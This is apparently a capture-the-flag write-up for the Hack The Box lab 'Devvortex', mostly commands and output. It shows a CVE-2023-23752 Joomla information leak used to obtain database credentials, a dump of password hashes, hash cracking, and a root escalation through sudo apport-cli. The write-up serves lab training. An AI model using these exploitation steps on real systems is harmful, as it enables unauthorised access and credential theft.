Devvortex
Recon
HTTP (80)
Joomla
CVE-2023-23752
RCE
Database Enumration
SSH
User.txt
Privilege Escalation
Last updated
Last updated
└─$ domain='devvortex.htb'; ffuf -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fw 4
v2.1.0-dev
dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 120ms]
:: Progress: [4989/4989] :: Job [1/1] :: 277 req/sec :: Duration: [0:00:10] :: Errors: 0 ::[+] Detecting Joomla Version
[++] Joomla 4.2.6└─$ curl http://dev.devvortex.htb/api/index.php/v1/config/application?public=true -s | jq .
{
"links": {
"self": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true",
"next": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20",
"last": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"
},
"data": [
{
"type": "application",
"id": "224",
"attributes": {
"offline": false,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"offline_message": "This site is down for maintenance.<br>Please check back again soon.",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"display_offline_message": 1,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"offline_image": "",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"sitename": "Development",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"editor": "tinymce",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"captcha": "0",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"list_limit": 20,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"access": 1,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"debug": false,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"debug_lang": false,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"debug_lang_const": true,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"dbtype": "mysqli",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"host": "localhost",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"user": "lewis",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"password": "P4ntherg0t1n5r3c0n##",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"db": "joomla",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"dbprefix": "sd4fg_",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"dbencryption": 0,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"dbsslverifyservercert": false,
"id": 224
}
}
],
"meta": {
"total-pages": 4
}
}www-data@devvortex:…/www/dev.devvortex.htb# cat configuration.php
<?php
class JConfig {
public $offline = false;
public $offline_message = 'This site is down for maintenance.<br>Please check back again soon.';
public $display_offline_message = 1;
public $offline_image = '';
public $sitename = 'Development';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = 20;
public $access = 1;
public $debug = false;
public $debug_lang = false;
public $debug_lang_const = true;
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'lewis';
public $password = 'P4ntherg0t1n5r3c0n##';
public $db = 'joomla';
public $dbprefix = 'sd4fg_';
public $dbencryption = 0;
public $dbsslverifyservercert = false;
public $dbsslkey = '';
public $dbsslcert = '';
public $dbsslca = '';
public $dbsslcipher = '';
public $force_ssl = 0;
public $live_site = '';
public $secret = 'ZI7zLTbaGKliS9gq';
public $gzip = false;
public $error_reporting = 'default';
public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
public $offset = 'UTC';
public $mailonline = true;
public $mailer = 'mail';
public $mailfrom = 'lewis@devvortex.htb';
public $fromname = 'Development';
public $sendmail = '/usr/sbin/sendmail';
public $smtpauth = false;
public $smtpuser = '';
public $smtppass = '';
public $smtphost = 'localhost';
public $smtpsecure = 'none';
public $smtpport = 25;
public $caching = 0;
public $cache_handler = 'file';
public $cachetime = 15;
public $cache_platformprefix = false;
public $MetaDesc = '';
public $MetaAuthor = true;
public $MetaVersion = false;
public $robots = '';
public $sef = true;
public $sef_rewrite = false;
public $sef_suffix = false;
public $unicodeslugs = false;
public $feed_limit = 10;
public $feed_email = 'none';
public $log_path = '/var/www/dev.devvortex.htb/administrator/logs';
public $tmp_path = '/var/www/dev.devvortex.htb/tmp';
public $lifetime = 15;
public $session_handler = 'database';
public $shared_session = false;
public $session_metadata = true;
}www-data@devvortex:…/www/dev.devvortex.htb# mysql -u lewis -p'P4ntherg0t1n5r3c0n##' -e 'SHOW DATABASES;'
Database
information_schema
joomla
performance_schema
www-data@devvortex:…/www/dev.devvortex.htb# mysql -u lewis -p'P4ntherg0t1n5r3c0n##' joomla -e 'SHOW TABLES;'
Tables_in_joomla
...
sd4fg_user_keys
sd4fg_user_mfa
sd4fg_user_notes
sd4fg_user_profiles
sd4fg_user_usergroup_map
sd4fg_usergroups
sd4fg_users
...
www-data@devvortex:…/www/dev.devvortex.htb# mysql -u lewis -p'P4ntherg0t1n5r3c0n##' joomla -e 'SELECT username, password FROM sd4fg_users;'
username password
lewis $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
logan $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tequieromucho (?)
1g 0:00:00:11 DONE (2024-11-24 16:34) 0.08750g/s 126.0p/s 126.0c/s 126.0C/s lacoste..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completedwww-data@devvortex:…/www/dev.devvortex.htb# echo 'tequieromucho' | su - logan -c 'id'
Password: uid=1000(logan) gid=1000(logan) groups=1000(logan)└─$ ssh logan@devvortex.htb -i id_rsalogan@devvortex:~$ cat user.txt
69399d0a3174a352c65bcab90c17a8e8logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-clilogan@devvortex:~$ sleep 60 &
[1] 2151
logan@devvortex:~$ kill -SIGSEGV 2151
logan@devvortex:~$ ls /var/crash/
_usr_bin_sleep.1000.crash
[1]+ Segmentation fault (core dumped) sleep 60
logan@devvortex:~$ sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
*** Send problem report to the developers?
After the problem report has been sent, please fill out the form in the
automatically opened web browser.
What would you like to do? Your options are:
S: Send report (30.0 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): V
*** Collecting problem information
The collected information can be sent to the developers to improve the
application. This might take a few minutes.
........................................................................................................................................................................................................................................................................................................................................................................<snip>
......................................................................ERROR: Cannot update /var/crash/_usr_bin_sleep.1000.crash: [Errno 13] Permission denied: '/var/crash/_usr_bin_sleep.1000.crash'
........!./b.in./ba.sh
root@devvortex:/home/logan# id
uid=0(root) gid=0(root) groups=0(root)root@devvortex:~# cat root.txt
1c4cce162d7ff2b42bc2241bdfc4d691